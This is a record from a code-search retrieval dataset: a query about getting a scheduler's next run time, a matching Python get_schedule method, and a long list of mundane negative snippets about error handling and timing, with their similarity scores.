{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def error(self, handler):\n pass", "def handle_err(self):\n pass", "def error_received(self, exc):\n print('Error received:', exc)", "def handle_expt(self):\r\n self._perform_on_error_handling()", "def _call_error_handler(self, event, err, **kwargs):\n if self._on_error_handler:\n event.error = str(err)\n event.origin_state = self.fullname\n return self._on_error_handler(event)", "def handle_error(self, request_handler, client_address):\n logger.debug('handle_error(%s:%s)' % client_address)", "def error(self, error):\n pass", "def handle_exception(e):\n print(e)\n return error()", "def handler(self, exctype, value, traceback):\n\n message = 'error occurred({}) in {}:{}'.format(value, traceback.tb_frame.f_code.co_filename, traceback.tb_lineno)\n self.errorSignal.emit()\n self.logger.critical('Unhandled exception: {}'.format(message))", "def on_error(self, callback):\n self.error_callback = callback", "def error_handler(self, error, *args, **kwargs):\n extras = []\n if args:\n extras.append(\"args={}\".format(args))\n if kwargs:\n extras.append(\"kwargs={}\".format(kwargs))\n if extras:\n msg = \"Handler (called with {}) raised error: {}\".format(\n \", \".join(extras), error)\n else:\n msg = \"Handler raised error: {}\".format(error)\n self.log_exception(msg)", "def exception_handler(self, exception):\n pass", "def on_error(self, status_code, data):\n\t\tprint(\"error_code: \",status_code)", "def error(self, func):\n self.error_handler = func\n return func", "def error(self, *args, **kwargs):", "def handle_error(self, request, error):\n self.log.error(\"An error occurred at request \" + repr(request) + \": \" + repr(error))", "def error_handler(self, e, name, handler):\n msg = '' if handler else ' (no handler)'\n LOGGER.debug('Monitoring error handling %s %s: %s', name, msg, e)\n if handler:\n try:\n handler(e)\n except Exception as handler_exception:\n LOGGER.error('Monitoring exception %s fail: %s', name, handler_exception)\n LOGGER.exception(handler_exception)\n else:\n LOGGER.exception(e)", "def error(self):\n ...", "def _set_error_handler(self):\n if self.on_error:\n error_step = self.context.root.path_to_step(self.on_error)\n self._on_error_handler = error_step.run", "def error_handler(self, view):\n self._error_response = view\n return view", "def internal_error_handler(error):\r\n return render_template('error.500.html')", "def _on_error(self, error):\n print(error + \" for \" + self.session_name)", "def error(self):\n pass", "def _raise_http_error(self, *args, **kwargs):", "def OnError(self, error):\r\n\t\tLogErr(error)\r\n#\t\tself.Shutdown()\r\n\t\tself.onError()", "def unexpected_error(self, exception):", "def _error_handling(self,e,func):\n print(self.type, \" sufferred exception in \" , func , \":\" , e)", "def error(self, msg, *args, **kwargs):\n pass", "def error_handler(e):\n logging.error('error_handler for socketio. An error has occurred: ' + str(e))", "def on_request_error(locust_instance, exception, tb, **kwargs):", "def error_handler(self):\n return self._error_handler", "def handle_error(self):\n self.cmd_channel.debug(\"DTPHandler.handle_error()\")\n try:\n raise\n # if error is connection related we provide a detailed\n # information about it\n except socket.error, err:\n if err[0] in errno.errorcode:\n error = err[1]\n else:\n error = \"Unknown connection error\"\n # an error could occur in case we fail reading / writing\n # from / to file (e.g. 
file system gets full)\n except EnvironmentError, err:\n error = _strerror(err)\n except:\n # some other exception occurred; we don't want to provide\n # confidential error messages to user so we return a\n # generic \"unknown error\" response.\n logerror(traceback.format_exc()) \n error = \"Unknown error\"\n self.cmd_channel.respond(\"426 %s; transfer aborted.\" %error)\n self.close()", "def _raise_performing_request_error(self, *args, **kwargs):", "def handle_error(self, params):\n\n # Run the error handler if needed.\n if (self.must_handle_error()):\n log.warning(\"Running On Error error handler...\")\n self.got_error = False\n self.error_handler.eval(context=self, params=params)\n\n # The error has now been cleared.\n self.got_error = False", "def error_handler(self, handler):\n if not self.opened():\n handler = handler or util.noop\n self._error_handler = enums.JLinkFunctions.LOG_PROTOTYPE(handler)\n self._dll.JLINKARM_SetErrorOutHandler(self._error_handler)", "def on_processing_error(self, event, context, exc):\n pass", "def error(session_id, context, e):\n pass", "def add_error_event(self, obj, event, *args):\n\t\thid = obj.connect(event, self._err_emited, *args)\t\n\t\tself.handlers_id.append(hid)", "def handle_error(self, data, **kwargs):\n logger.log_err(str(data))", "def error_handler(msg):\n print(\"Server Error: %s\" % msg)", "def error_handler(self, failure):\n log.error(failure)", "def error(self, flow: mitmproxy.http.HTTPFlow):", "def error_handler(num, err):\n print(\"Error in input {}\".format(num))\n err = err.decode()\n raise Exception(err)", "def sm_error_handler(self, errors):\n try:\n yield\n except Exception as e:\n if issubclass(e.__class__, ManagerError) or \\\n issubclass(e.__class__, ManagerFatalError) or \\\n isinstance(e, ConnectionError) or \\\n xmlrpclib.ProtocolError or \\\n xmlrpclib.Fault:\n\n errors.append(repr(e))\n elif isinstance(e, socket.error):\n errors.append(repr(e))\n errors.append(\"Please make sure the server port is open.\")\n else:\n raise e", "def error_handler(msg):\n print \"Server Error: %s\" % msg", "def error_handler(msg):\n print \"Server Error: %s\" % msg", "def _handle_error(self, errno, msg):\n if self.error_callback != None:\n #Call the error callback but expect failure.\n try:\n self.error_callback(errno, msg, self.rpcclient)\n except Exception as ex:\n self.log.failure(\"Error in error handler for '{cmd!r}'.\",cmd=self.command)\n else:\n #If no handler is set, all we do is log.\n self.log.error(\"Notice: no on_error defined for '{cmd!r}, command result: {msg!r}\",cmd=self.command,msg=msg)", "def on_error(self, exception):\n traceback.print_exc()", "def handle_error(self):\n self.cmd_channel.debug(\"ActiveDTP.handle_error()\")\n logerror(traceback.format_exc())\n self.close()", "def init_error_handler(app):\n app.register_error_handler(Exception, global_handler)\n return app", "def indicate_error(self):\n pass", "def _default_error_handler(self, exception):\n\n self.log.error(exception)\n return '', 500", "def error(self, flow: mitmproxy.http.HTTPFlow):\n pass", "def error(self, flow: mitmproxy.http.HTTPFlow):\n pass", "def process_error(self, id, code, error):\n raise NotImplementedError('process_error not implemented in BaseService')", "def handle_error(self):\n debug(\"FTPServer.handle_error()\")\n logerror(traceback.format_exc())\n self.close()", "def on_request_error(self, status_code):\n log.error(\"Stream encountered HTTP error: %d\", status_code)", "def handle_error(self, request, client_address):\n\t\tprint 
'-'*40\n\t\tprint 'Exception happened during processing of request from',\n\t\tprint client_address\n\t\timport traceback\n\t\ttraceback.print_exc() # XXX But this goes to stderr!\n\t\tprint '-'*40", "def error(self):\n return self._decorator_wrapper(EventName.error)", "def error(self, func):\r\n if not asyncio.iscoroutinefunction(func):\r\n raise TypeError(\"The local error handler must be an async function\")\r\n self._error_handler = func\r\n return func", "def handle_error(self, api, command):\n return self.handle_log(api, command, level=logging.ERROR)", "def handle_error():\n print \"An error occurred. Trace:\\n\"\n traceback.print_exc()", "def _call_error_handler(self, handle_error, confidence):\n handle_error(line_number=100,\n category=self._category,\n confidence=confidence,\n message=\"message\")", "def serious_error(self, e):\n pass", "def on_failure(self, exc: BaseException) -> None:", "def _on_exception(self, exception):\n pass", "def onError(self, error):\n log.err(\"Encountered an error: {0}\".format(\n error.getErrorMessage()))\n return error", "def on_error(ws, error):\n logging.error(\"Error:-\", error)", "def error(ctx, flow):\n ctx.log(\"error\")", "def on_error(self, event: ThreadResult):\n if self._on_error is not None:\n self._on_error(event.data)", "def error(self, tag, message, exc_info=False):\n \n self.log(logging.error,tag, message, exc_info)", "def handle_error(self, error):\n html = error.response.content\n raise SystemExit(\"API Error:\\n %s\" %\n \"\\n \".join(html.itertext()))", "def _handle_error(cls, e, request):\r\n if e.check(InvalidRequest):\r\n msg = e.getErrorMessage()\r\n code = httpstatus.HTTP_STATUS_CODE_BAD_REQUEST[0]\r\n else:\r\n e.printTraceback()\r\n msg = 'Fatal Error'\r\n code = httpstatus.HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0]\r\n\r\n cls._render(request, code, 'text/plain; charset=utf-8', msg)", "def handle_exception(error):\n return make_response(jsonify({'message': error.description}), 400)", "def __empty_error_event_handler(self, govee, device, message, exception):\n\n pass", "def on_error(data):\n print('Market Data Error', data)", "def raise_on_error(self):\n if not self._status.success:\n cls = UrlApi.InfraHTTPError if self._infra_step else UrlApi.HTTPError\n raise cls('HTTP status (%d)' % (self.status_code,), self)", "def error_handler(response, **kwargs):\n if 400 <= response.status_code <= 499:\n message = response.json()['error_description'] \\\n if 'error_description' in response.json() \\\n else response.json()['error_detail']\n raise ClientError(response, message)\n\n elif 500 <= response.status_code <= 599:\n raise ServerError(response)\n\n return response", "def error(self, *args):\n\n if self.is_on(_Log.ERROR):\n self._write(self._err, *args)", "def error(self, *args, **kwargs):\n\n message = self.get_message(*args, **kwargs)\n self.logger.error(message)", "def getErrorHandler(self):\n pass", "def _handle_error(self, failure, item, spider):\n # do nothing, just log\n log.err(failure)", "def handle_error(error):\n return render_template('errors/{}.html'.format(error.code)), error.code", "async def on_handle_message_error(self, message: andesite.ReceiveOperation, exc: Exception) -> None:\n log.error(f\"uncaught error {exc} in {self} when handling message {message}\")", "async def on_error(self, event: str, error: Exception, *args, **kwargs):\n print(f\"Ignoring exception in {event}\", file=sys.stderr)\n traceback.print_exception(type(error), error, error.__traceback__, file=sys.stderr)", "def after_error_request(self, 
f):\n self.after_error_request_handlers.append(f)\n return f", "def _on_error(self, type, value, tb):\n \n # get exception\n exception = traceback.format_exception(type, value, tb)\n exception = '\\n'.join(exception)\n \n # show error message\n dlg = ErrorDlg(self, exception)\n dlg.ShowModal()\n dlg.Destroy()", "def _err(self, *args):\n logger.error(*args)\n exit(1)", "def catch_error(self, eid):\n\n if eid not in (5, 301):\n logger.error('Error %d: %s (%s)' % (eid, NETWORK_ERROR.get(eid, 'unknown error'),\n self.sender().url().toString()))", "def handle_error(self):\n self.cmd_channel.debug(\"PassiveDTP.handle_error()\")\n logerror(traceback.format_exc())\n self.close()", "async def on_error(ctx, error):\n await send_block(\n ctx,\n \"\".join(\n traceback.format_exception(\n etype=type(error), value=error, tb=error.__traceback__\n )\n ),\n )", "def set_error_handler(self,error_handler):\n\t\tif(callable(error_handler)):\n\t\t\tself.error_handler = error_handler\n\t\telse:\n\t\t\traise NotCallableException(\"{} object is not callable\".format(type(error_handler)))", "def _on_server_error(server, *_):\n exception = sys.exc_info()[1]\n if isinstance(exception, ConnectionError):\n # These are expected errors when the browser closes the connection.\n return\n # Other errors would be unexpected, so print them.\n traceback.print_exc()", "def on_failure(self):\n pass", "def error ( self , message , *args , **kwargs ) :\n return self.logger.error ( message , *args , **kwargs )", "def _error(msg):\n\n error(None, msg)", "def not_found_error_handler(error):\r\n return render_template('error.404.html')", "def _handle_error(self, exc: BaseException, reraise: bool = True) -> None:\n if self._breaker.is_system_error(exc):\n self._breaker._inc_counter()\n for listener in self._breaker.listeners:\n listener.failure(self._breaker, exc)\n self.on_failure(exc)\n else:\n self._handle_success()\n\n if reraise:\n raise exc", "def _errorRedirection(self, ex):\n self._errorRaisedNotifier.notify(ex)\n\n self._mustBeAborted = True", "def error():\n return None" ]
[ "0.8809893", "0.7991302", "0.7537642", "0.7489565", "0.74614865", "0.7459694", "0.74516124", "0.74178", "0.7346542", "0.7311401", "0.73027474", "0.7302706", "0.72894347", "0.72691995", "0.72537273", "0.72459257", "0.72391665", "0.7171314", "0.7167411", "0.7127044", "0.7114514", "0.71075606", "0.70406294", "0.70352125", "0.7018041", "0.7008118", "0.70021147", "0.6987824", "0.6967485", "0.696639", "0.69624174", "0.6953463", "0.6948087", "0.6943106", "0.69414735", "0.691097", "0.6898141", "0.6891603", "0.6889701", "0.6870068", "0.6862695", "0.68597424", "0.6858077", "0.68567955", "0.6853662", "0.6853662", "0.6848625", "0.6841722", "0.6835778", "0.6828958", "0.6823308", "0.6798", "0.6797275", "0.6797275", "0.6790925", "0.6773277", "0.67347497", "0.67277735", "0.67186177", "0.6706165", "0.6706165", "0.66939294", "0.6673175", "0.66682684", "0.66655296", "0.6663148", "0.6661631", "0.665874", "0.6652718", "0.6648257", "0.6646493", "0.66366273", "0.66334444", "0.6611385", "0.6604501", "0.66019225", "0.65950817", "0.6595069", "0.65939784", "0.65919244", "0.65905493", "0.6581378", "0.65810037", "0.6562909", "0.65572757", "0.65522736", "0.6539245", "0.6534405", "0.6529138", "0.6528292", "0.65244985", "0.6520816", "0.65163946", "0.6515357", "0.65109843", "0.64980066", "0.6497903", "0.6493083", "0.649307", "0.64896953" ]
0.7198904
17
Called by scheduler to get next run time
def get_schedule(self, status):
    if status == self.S_LATE and self.delay_interval:
        return (datetime.datetime.now() + datetime.timedelta(
            seconds=random.random() * self.delay_interval))
    return None  # Remove schedule on complete
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_run_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"next_run_time\")", "def next_run_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"next_run_time\")", "def get_curr_exec_time(self):\n if self.type == 'normal':\n try:\n self.curr_exec_time = self.my_rand.gauss(self.runtime, self.stddev)\n except:\n if self.fwk.debug:\n print(\"not varying the execution time\")\n self.curr_exec_time = self.runtime\n raise\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n elif self.type == 'sandia_work':\n # this is a sandia style work task\n next_ckpt = self.sim.next_ckpt # relative work time\n work_todo = self.sim.total_work - self.sim.completed_work\n self.curr_exec_time = min(work_todo, next_ckpt)\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n elif self.type == 'sandia_rework':\n next_ckpt = self.sim.next_ckpt # relative work time\n self.curr_exec_time = min(self.sim.rework_todo, next_ckpt)\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n elif self.type == 'sandia_ckpt' or self.type == 'sandia_restart':\n self.curr_exec_time = self.runtime\n self.start_exec_time = self.fwk.fwk_global_time\n self.state = \"running\"\n else:\n print('error error error!!! problem with component type in get_curr_exec_time')\n raise", "def get_next_run_time(period, inst):\n period_sec = int(period)\n now = round(time.time())\n # Dry run mode.\n if dry_run is True:\n print(\"Running in {} secs\".format(now%period_sec))\n return (now%period_sec)\n\n\n # Number of secs that has elapsed since mkt open.\n secs_since_mkt_open = now - Instrument_CP.seconds_since_epoch_at_mkt_open[inst.tsb]\n\n \"\"\"\n If we started before market open, schedule at market_open + period\n Note: We pass the number of seconds from now.\n \"\"\"\n\n if (get_secs_to_mkt_close(inst.xch) < 0):\n logging.debug(\"sec to mkt close %d\" % (get_secs_to_mkt_close(inst.xch)))\n logging.debug(\"market closed\")\n return 0\n\n if secs_since_mkt_open < 0:\n logging.debug(\"market will open in %d\" % secs_since_mkt_open)\n return (-(secs_since_mkt_open))\n else:\n # Period in secs.\n logging.debug(\"next tun time %d\" % (period_sec - secs_since_mkt_open%period_sec))\n return ((period_sec - secs_since_mkt_open%period_sec) + 1)", "def start_time(self) -> float:\r\n ...", "def schedule(self):\n\n crontab = self._crontab\n return datetime.now() + timedelta(\n seconds=math.ceil(\n crontab.next(default_utc=False)\n )\n )", "def start_time(self):\n pass", "def _next_request_ts(self):\n\n self._logger.debug(\"PrototypeServer._next_request_ts()\")\n\n # set if not already contained in config\n if self._config.get('inter_request_not_pause', False):\n self._config['inter_request_not_pause'] = True\n else:\n self._config['inter_request_not_pause'] = False\n\n if self._config['inter_request_not_pause']:\n self._logger.debug(\"Using old request timestamp as starting point\")\n t_ref = self._next_request\n self._logger.debug(\"Using time.time() as starting point\")\n else:\n t_ref = time.time()\n\n # Constant time between requests\n if self._config['request_mode'] == 'constant':\n req_ts = t_ref + self._config['request_interval']\n # Exponential distributed time between the requests\n elif self._config['request_mode'] == 'exponential':\n req_ts = t_ref + np.random.exponential(self._config['request_interval'])\n else:\n raise Exception(\"Unknown request mode %s\" % self._config['request_mode'])\n\n self._logger.debug(\"next_request_ts(): mode: %s, 
interval: %.1f, rel_ts: %.3fs, inter_request_not_pause %s\" %\n (self._config['request_mode'], self._config['request_interval'], req_ts - time.time(), self._config['inter_request_not_pause']))\n\n return req_ts", "def next_schedule(self) -> datetime:\n return next(self._interval)", "def __get_starting_time(self):\n return self.__starting_time", "def _get_timebase(self):\n return clock()", "def _get_timebase(self):\n return clock()", "def _run_time(func):\n start_time = datetime.datetime.now()\n func\n end_time = datetime.datetime.now()\n return end_time - start_time", "def getSubmitTime():", "def update(self):\r\n \r\n self.time_to_next_fire = self.generate_fire_recurrence()\r\n return self.time_to_next_fire", "async def get_now_ts(self) -> int:\n return await self.AD.sched.get_now_ts()", "def _get_next_time(self, curr_time):\n return curr_time + self.time_dist.random()", "def time_run(self):\n if self._time_run is None:\n self._time_run = datetime.now(timezone.utc)\n return self._time_run.isoformat()", "def _sched_next(self):\n now = time()\n\n # Check if samples have been met\n if self._samples is not None:\n if self._runs_passed >= self._samples:\n log.info(\n 'Pipeline {} collected {} samples successfully in {}. '\n '{} executions failed, {} executions missed. '\n 'Exiting...'.format(\n self._pipeline.name,\n self._runs_passed,\n str(timedelta(seconds=now - self._start)),\n self._runs_failed,\n self._runs_missed,\n )\n )\n return\n\n # If not, continue scheduling samples\n next_time = self._last_run + self._frequency\n\n # Check no ticks were missing, if next_time is in the past\n if next_time <= now:\n self._runs_missed += 1\n\n log.info(\n 'Next run missed. Starting {} pipeline immediately ...'.format(\n self._pipeline.name\n )\n )\n event = self._scheduler.enter(\n 0, 1, self._sched_work\n )\n\n else:\n log.info('Scheduling next pipeline run in {} ...'.format(\n str(timedelta(seconds=next_time - now)),\n ))\n event = self._scheduler.enterabs(\n next_time, 1, self._sched_work\n )\n\n self._last_run = event.time", "def seconds_before_next_run(self):\n period, last_start_time = self.period, self.last_start_time\n now = utcnow()\n if isinstance(period, Weekly):\n then = now.replace(hour=period.hour, minute=10, second=0, microsecond=0)\n days = (period.weekday - now.isoweekday()) % 7\n if days:\n then += timedelta(days=days)\n if (last_start_time or EPOCH) >= then:\n then += timedelta(days=7)\n elif isinstance(period, Daily):\n then = now.replace(hour=period.hour, minute=5, second=0, microsecond=0)\n if (last_start_time or EPOCH) >= then:\n then += timedelta(days=1)\n elif period == 'irregular':\n return 0 if self.thread and self.thread.is_alive() else None\n elif last_start_time:\n then = last_start_time + timedelta(seconds=period)\n else:\n then = now\n return (then - now).total_seconds()", "def next(self):\n\n crontab = self._crontab\n return math.ceil(crontab.next(default_utc=False))", "def get_running_time(self):\n with open(self.running_time_file, 'r') as file:\n return int(file.read().strip())", "def cpu_time(self):", "def update(self):\n\n self.time_to_next_fire = self.generate_fire_recurrence()\n return self.time_to_next_fire", "def find_next_run_time(self, cron_hour, cron_minute, current_hour,\n current_minute, hour_delta, minute_delta):\n NOW = 0\n LAST_HOUR_OF_DAY = 23\n EVERY_MINUTE = u'*'\n EVERY_HOUR = u'*'\n CURRENT_DAY = u'today'\n NEXT_DAY = u'tomorrow'\n\n if cron_minute == EVERY_MINUTE and cron_hour == EVERY_HOUR:\n # Should run every minute of every hour in a day\n 
next_run_minute = current_minute\n next_run_hour = current_hour\n next_run_day = CURRENT_DAY\n\n elif cron_hour == EVERY_HOUR:\n # Minute is set but should run every hour of a day\n # Cron run time has passed\n if minute_delta < NOW:\n # Check for time going into next day (after 23:00)\n if current_hour != LAST_HOUR_OF_DAY:\n next_run_hour = current_hour + 1\n next_run_day = CURRENT_DAY\n else:\n next_run_hour = NOW\n next_run_day = NEXT_DAY\n else:\n next_run_hour = current_hour\n next_run_day = CURRENT_DAY\n\n next_run_minute = cron_minute\n\n elif cron_minute == EVERY_MINUTE:\n # Hour is set but should run every minute of that hour\n # Cron run time has passed\n if hour_delta < NOW:\n next_run_minute = NOW\n next_run_day = NEXT_DAY\n elif hour_delta == NOW:\n next_run_minute = current_minute\n next_run_day = CURRENT_DAY\n else:\n next_run_minute = NOW\n next_run_day = CURRENT_DAY\n\n next_run_hour = cron_hour\n\n else:\n # Both Hour and minute are specified and should only run then\n # Cron run time has passed\n if hour_delta < NOW:\n next_run_day = NEXT_DAY\n elif hour_delta == NOW:\n if minute_delta < NOW:\n next_run_day = NEXT_DAY\n else:\n next_run_day = CURRENT_DAY\n else:\n next_run_day = CURRENT_DAY\n\n next_run_minute = cron_minute\n next_run_hour = cron_hour\n\n # Convenient structure\n next_run_time = {\n u'day': next_run_day,\n u'hour': next_run_hour,\n u'minute': next_run_minute\n }\n\n return next_run_time", "def get(self):\n if self.running:\n return self.accumulated_time + pg.time.get_ticks() - self.start_time\n else:\n return self.accumulated_time", "def _time(self):\n return time()", "def set_next_order_arrival_time():\n if global_settings.demand_distribution == \"uniform\":\n # Update the time_of_next_order_arrival to a random time within the interval specified in global_settings\n global_settings.time_of_next_order_arrival = \\\n global_settings.current_time + round(random.uniform(\n global_settings.next_order_arrival_lower_bound,\n global_settings.next_order_arrival_upper_bound))\n elif global_settings.demand_distribution == \"exponential\":\n # Update the time_of_next_order_arrival to a random time from an exponential distribution\n random_exponential_number = \\\n get_random_exponential_number(global_settings.next_order_arrival_exponential_rate_parameter)\n if random_exponential_number == 0:\n random_exponential_number = 1\n global_settings.time_of_next_order_arrival = global_settings.current_time + random_exponential_number\n # print(\"time to next order:\" + str(random_exponential_number))\n else:\n raise ValueError(\"global_settings.demand_distribution invalid value assigned. 
\"\n \"Must be 'exponential' or 'uniform'\")\n return", "async def time(self) -> dt.time:\n now = await self.AD.sched.get_now()\n return now.astimezone(self.AD.tz).time()", "def wall_time(self):", "def internal_timestep(self):\n try:\n return self._internal_dt\n except AttributeError:\n # the component hasn't started running yet\n _ = self.calc_grads_and_timesteps(False, False)\n return self._internal_dt", "def get_time(self):\n\t\treturn time.time()", "def get_attempt_start_time():\n pass", "def next_run(self):\n self.load_run(run=self.run+1)", "def time(self):\r\n raise NotImplementedError", "def schedule_time(self) -> str:\n return pulumi.get(self, \"schedule_time\")", "def _compute_next_update(self):\n self.next_update = datetime.now() + timedelta(seconds=self.min_interval)", "def check(self):\r\n boto.log.info('checking Task[%s]-now=%s, last=%s' % (self.name, self.now, self.last_executed))\r\n\r\n if self.hourly and not self.last_executed:\r\n return 0\r\n \r\n if self.daily and not self.last_executed:\r\n if int(self.hour) == self.now.hour:\r\n return 0\r\n else:\r\n return max( (int(self.hour)-self.now.hour), (self.now.hour-int(self.hour)) )*60*60\r\n\r\n delta = self.now - self.last_executed\r\n if self.hourly:\r\n if delta.seconds >= 60*60:\r\n return 0\r\n else:\r\n return 60*60 - delta.seconds\r\n else:\r\n if int(self.hour) == self.now.hour:\r\n if delta.days >= 1:\r\n return 0\r\n else:\r\n return 82800 # 23 hours, just to be safe\r\n else:\r\n return max( (int(self.hour)-self.now.hour), (self.now.hour-int(self.hour)) )*60*60", "def t(self):\n return self._data_writer.get_current_run_time_ms()", "def test_run_is_next_run(curent_time, state):\n date = datetime(2020,5,5,12,0)\n duration_in_minutes = 65\n run = Run(date, duration_in_minutes/60)\n\n assert run.is_next_run(curent_time) == state", "def sys_time(self):\n timestamp = None\n for i in range(10):\n while timestamp is None:\n timestamp = self.acquire_system_time()\n break\n return timestamp", "def getTimes():", "def getTimes():", "def getTimes():", "def actual_time():\n return _time.time()", "def initialTime(self):\n return self.params['t0']", "def compute_time_step():\n\n dt = Hydro.compute_time_step()\n\n return dt", "def time(self):\n raise NotImplementedError()", "def init_time():\r\n\tstarttime = time.time()\r\n\treturn starttime # return the start time\r", "def next_job_run(self):\n return self._data.get('next_job_run')", "def next_run(self):\n for run in self._runs:\n # Because the runs are ordered, look for the first run where\n # stop_time is in the future.\n if run.is_next_run(self._now):\n return run\n # If we arrive here, no next run (today).\n return None", "def next_run_date(self):\n return (\n datetime.combine(self.start_date, datetime.min.time(), tzinfo=pytz.UTC)\n if self.start_date and self.start_date > date.today()\n else None\n )", "def next_run_date(self):\n return (\n datetime.combine(self.start_date, datetime.min.time(), tzinfo=pytz.UTC)\n if self.start_date and self.start_date > date.today()\n else None\n )", "def getCurrentSimulationTime(self):\r\n raise NotImplementedError()", "def cron(self):\n return", "def time(self) -> int:\n pass", "def returnGlobalTimer(self):\n self.globalTime = (time.time() - self.globalStartRef) + self.addedTime #Reports time in minutes, addedTime is for population reboot.\n return self.globalTime/ 60.0", "def _calculate_runtime(self):\n lines = self.file_dic['output'].splitlines()\n start_time = datetime.strptime(lines[0].strip(), self.timestring_format)\n fin_time = 
datetime.strptime(lines[-1].strip(), self.timestring_format)\n dif = fin_time - start_time\n self.date = fin_time.strftime('%d %b %Y')\n self.runtime = dif.total_seconds()", "def get_time(cls):\n now = rospy.Time.now()\n return now.secs + now.nsecs*(10**-9) # time in seconds", "def lr_scheduler(self, lr_init, global_step):\n pass", "def realtime():\n return timemodule.time()", "def get_exec_time(self):\n return self._exec_time", "def get_nightly_start_time():\n return 14 # 2PM local Tucson time", "def _start_launch_time(self, launched_event):\n if launched_event:\n interval = Interval(0, launched_event.timestamp)\n return self._trace.cpu.task_intervals(task=launched_event.task,\n interval = interval)[0].interval.start", "def step(self):\n\n e = self.event_queue.get()\n self.current_time = e.time\n component = e.component\n component.output(self.current_time)\n component.input(self.current_time)\n component.fire()\n\n self.event_queue.put(VirtualTimeScheduler.Event(self.current_time + component.interval, component))\n\n return self.current_time", "def getStartTime(self):\n assert not self.isWaitingToStart(), \"Too early to tell: %s\" % self\n return \"%s\" % self.__rawInfo.startTime", "def get_time(self):\n return self.run_command('get_time')[0]", "def run_hour(self) -> int:\n return self.timestamp.hour", "def _inst_run(self):\r\n self._inst_get_img_info_from_db()\r\n print(\"run method: \", time.ctime())\r\n th = threading.Timer(\r\n 10,\r\n self._inst_run\r\n )\r\n th.start()", "def get_task_time(self, task):\n task.task_time = TASK_TYPES[task.task_type]\n print(\"Fetched task time\")", "def get_real_time(self):\n \n import time\n return time.clock()", "def schedule(self):\r\n n = self.next()\r\n if n is not None:\r\n if self.clock:\r\n self.cl = self.clock.callLater(n, self.run)\r\n else:\r\n self.cl = core.call_later(n, self.run)\r\n else:\r\n self.cl = None", "def get_next_known_start_time(self, current_time):\n raise NotImplementedError()", "def _next_update_time(self, seconds=10):\n now = get_aware_utc_now()\n next_update_time = now + datetime.timedelta(\n seconds=seconds)\n return next_update_time", "def run_date(self) -> datetime.date:\n return self.timestamp.date()", "def getSimulationTime(self):\r\n raise NotImplementedError()", "def current_time(cls) -> float:", "def update_time(self):\n pass # Do nothing", "def get_next_day(self):\n pass", "def getStartTime(self):\n raise NotImplementedError", "def find_tim(self):\n start_max = 0\n finish_max = 0\n op_mode = self.op_number + ',' + self.mode_number\n for resource in self.resources:\n end_time = resource.usage[op_mode][\"start_time\"] + resource.usage[op_mode][\"duration\"]\n if end_time > finish_max:\n finish_max = end_time\n start_max = resource.usage[op_mode][\"start_time\"]\n self.tim = finish_max\n self.sim = start_max", "def run_single(self):\n self.run_sim_time(1)", "def start(self):\r\n self.start_time = time.time()", "def __call__(self):\n return self.timer()", "def time(self):\n return self._clock() - self._starttime", "def time(self):\n return self._begin", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n 
return self.__scheduler", "def __nextRun(self, t1, t2):\n if self.t1==t1:\n # rerun from t1\n if self.t2!=t2:\n raise Exception(\"bad t2 (%f!=%f)\" % (t2, self.t2)) \n \n loader = fac.FacManager(self.metafor)\n nt = loader.lookForFile(self.nbFacs) #(0)\n loader.eraseAllFrom(nt)\n self.runOK = self.metafor.getTimeIntegration().restart(nt)\n else:\n # new time step\n tsm = self.metafor.getTimeStepManager()\n dt=t2-t1\n dtmax=dt\n tsm.setNextTime(t2, 1, dtmax) \n \n loader = fac.FacManager(self.metafor)\n nt1 = loader.lookForFile(self.nbFacs) #(0)\n nt2 = loader.lookForFile(self.nbFacs+1) #(1)\n if not self.saveAllFacs:\n loader.erase(nt1) # delete first fac\n self.runOK = self.metafor.getTimeIntegration().restart(nt2)\n if self.saveAllFacs:\n self.nbFacs+=1", "def __time(self):\n return time.time()", "def real_time(self):\n try:\n # TODO: Update for resuming runs\n with open(path.join(self.run_dir, \"TIMINGS\", \"timings.001\"), \"r\") as f:\n text = f.read()\n r = re.match(r\" Total time for loop was(?: *)(.*?)(?: *)seconds\", text, re.DOTALL + re.MULTILINE)\n if not r:\n logger.warning(\"Bad format in timings file. The real time could not be read.\")\n return float(\"nan\")\n else:\n return float(r.group(1))\n except FileNotFoundError:\n return float(\"nan\")", "def exec_time_processor(self):\n with open(join(self.logs_dir, \"clock_time.dat\"), 'w') as fh:\n fh.write(\"Time ExecutionTime ClockTime\\n\")\n while True:\n rexp = (yield)\n fh.write(self.time_str + \"\\t\" +\n \"\\t\".join(x for x in rexp.groups()) + \"\\n\")\n self._tick = True", "def gettime(self):\n return self.t", "def runtime(self):\n return (self.time - self.start).total_seconds()" ]
[ "0.777297", "0.777297", "0.6952469", "0.6825533", "0.67416143", "0.6597113", "0.6557749", "0.65416026", "0.65218025", "0.65074617", "0.64740384", "0.64740384", "0.6465585", "0.64539963", "0.6424806", "0.64134806", "0.638315", "0.6380247", "0.63793695", "0.63596106", "0.63256323", "0.6294104", "0.6291601", "0.62844247", "0.62825316", "0.627319", "0.6251894", "0.62510294", "0.6235922", "0.6197435", "0.6196869", "0.619148", "0.61813873", "0.61743236", "0.6170199", "0.6167948", "0.6158182", "0.6141629", "0.61368316", "0.6134549", "0.6131733", "0.6129247", "0.6129247", "0.6129247", "0.6110128", "0.6078869", "0.6074122", "0.60596746", "0.6053864", "0.604987", "0.6048813", "0.6048377", "0.6048377", "0.60474765", "0.60465837", "0.6041438", "0.6038686", "0.6036047", "0.6035137", "0.6013527", "0.6011462", "0.6011001", "0.6004073", "0.60026836", "0.5998367", "0.59974974", "0.59967726", "0.5991745", "0.59893143", "0.59863544", "0.5977296", "0.5968897", "0.59614336", "0.5959509", "0.59594756", "0.59585106", "0.5957449", "0.5955391", "0.59519356", "0.59452915", "0.593553", "0.5930359", "0.5925394", 